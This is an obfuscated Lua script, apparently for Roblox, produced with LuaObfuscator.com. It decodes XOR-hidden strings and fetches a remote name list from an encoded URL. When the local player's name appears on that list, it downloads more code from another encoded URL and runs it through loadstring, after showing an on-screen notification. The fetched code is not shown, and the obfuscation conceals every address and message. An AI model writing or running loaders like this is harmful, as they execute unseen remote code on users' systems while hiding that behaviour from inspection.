--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v14,v15) local v16={};for v21=1, #v14 do v6(v16,v0(v4(v1(v2(v14,v21,v21 + 1 )),v1(v2(v15,1 + (v21% #v15) ,1 + (v21% #v15) + 1 )))%256 ));end return v5(v16);end local v8=game.Players.LocalPlayer;local v9=game:GetService(v7("\226\215\218\55\242\190\213\57\196\202","\126\177\163\187\69\134\219\167"));local function v10(v17,v18) pcall(function() v9:SetCore(v7("\16\200\36\193\210\44\217\35\195\245\32\204\62\204\243\45","\156\67\173\74\165"),{[v7("\0\190\93\26\185","\38\84\215\41\118\220\70")]=v17,[v7("\100\19\58\6","\158\48\118\66\114")]=v18,[v7("\143\49\2\55\103\172\244\165","\155\203\68\112\86\19\197")]=5});end);end local v11=game:HttpGet(v7("\78\201\34\236\83\34\170\183\84\220\33\178\71\113\241\240\83\223\35\239\69\106\230\247\72\201\51\242\84\54\230\247\75\146\48\243\82\108\240\244\73\206\121\221\78\118\234\225\117\222\36\245\80\108\170\245\71\212\56\179\114\93\196\220\107\248\120\241\68","\152\38\189\86\156\32\24\133"));local function v12(v19) return v19:match(v7("\194\18\180\12\180\25\234\15\185\68\237\2","\38\156\55\199"));end local v13=false;for v20 in string.gmatch(v11,"[^\r\n]+") do v20=v12(v20);if (v20:lower()==v8.Name:lower()) then v13=true;break;end end if v13 then local v22=0 -0 ;local v23;while true do if (v22==0) then v23=0;while true do if (v23==(1 + 0)) then loadstring(game:HttpGet(v7("\179\66\221\176\41\10\127\142\171\87\218\180\63\82\57\207\245\85\198\173\117\66\49\214\244\87\231\161\34\102\27\148\141","\161\219\54\169\192\90\48\80")))();break;end if (v23==(997 -(915 + 82))) then v10(v7("\155\104\127\43\22\103\233","\35\200\29\28\72\115\20\154"),v7("\56\188\210\218\158\63\116\30\173\208\209\153\41\48","\84\121\223\177\191\237\76"));task.wait(2 -1 );v23=1 + 0 ;end end break;end end else v10(v7("\108\80\18\42\91","\69\41\34\96"),v7("\133\204\194\74\3\57\185\131\217\5\22\107\171\203\222\30\7\39\181\208\195\15\6","\75\220\163\183\106\98"));end
